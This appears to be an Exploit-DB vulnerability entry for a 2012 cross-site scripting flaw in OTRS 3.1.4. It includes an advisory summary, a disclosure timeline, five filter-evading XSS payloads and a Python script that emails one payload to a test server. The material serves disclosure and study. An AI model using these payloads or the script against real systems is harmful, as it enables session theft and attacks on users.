OTRS Open Technology Real Services XSS Vulnerability

vendor:

OTRS Open Technology Real Services

by:

loneferret of Offensive Security

7,5

CVSS

HIGH

Cross-Site Scripting (XSS)

CWE

Product Name: OTRS Open Technology Real Services

Affected Version From: 3.1.4

Affected Version To: 3.1.4

Patch Exists: YES

Related CWE: CVE-2012-3286

CPE: a:otrs:otrs

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2012

OTRS Open Technology Real Services XSS Vulnerability

A Cross-Site Scripting (XSS) vulnerability was discovered in OTRS Open Technology Real Services version 3.1.4. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'Body' parameter. A remote attacker can send a specially crafted request containing malicious HTML and script code to the vulnerable application and execute arbitrary code in the browser of the victim in the context of the vulnerable site. Successful exploitation of this vulnerability may allow an attacker to steal cookie-based authentication credentials and launch other attacks.

Mitigation:

Update to the latest version of OTRS Open Technology Real Services.

Source

Exploit-DB raw data:

#!/usr/bin/python

'''

Author: loneferret of Offensive Security
Product: OTRS Open Technology Real Services
Version: 3.1.4 (Windows)
Vendor Site: http://www.otrs.com/en/

Timeline:
29 May 2012: Vulnerability reported to CERT
30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012
23 Jul 2012: Update from CERT: No response other than auto-reply from vendor
08 Aug 2012: Public Disclosure
22 Aug 2012: Update from CERT: vulnerability patched
     http://www.kb.cert.org/vuls/id/582879
     http://www.otrs.com/en/open-source/community-news/security-advisories/security-advisory-2012-01/

Installed On: Windows Server 2003 SP2
Client Test OS: Window 7 Pro SP1 (x86)
Browser Used: Internet Explorer 9

Injection Point: Body
Injection Payload(s):
1: <DIV STYLE="width: expression(alert('XSS'));">
2: exp/*<XSS STYLE='no\xss:noxss("*//*");
xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>
3: <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
4: <XSS STYLE="xss:expression(alert('XSS'))">
5: <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

'''

import smtplib, urllib2
 
payload = """<DIV STYLE="width: expression(alert('XSS'));">"""
 
def sendMail(dstemail, frmemail, smtpsrv, username, password):
        msg  = "From: hacker@offsec.local\n"
        msg += "To: victim@victim.local\n"
        msg += 'Date: Today\r\n'
        msg += "Subject: Offensive Security\n"
        msg += "Content-type: text/html\n\n"
        msg += "XSS" + payload + "\r\n\r\n"
        server = smtplib.SMTP(smtpsrv)
        server.login(username,password)
        try:
                server.sendmail(frmemail, dstemail, msg)
        except Exception, e:
                print "[-] Failed to send email:"
                print "[*] " + str(e)
        server.quit()
 
username = "hacker@offsec.local"
password = "123456"
dstemail = "victim@victim.local"
frmemail = "hacker@offsec.local"
smtpsrv  = "172.16.84.171"
 
print "[*] Sending Email"
sendMail(dstemail, frmemail, smtpsrv, username, password)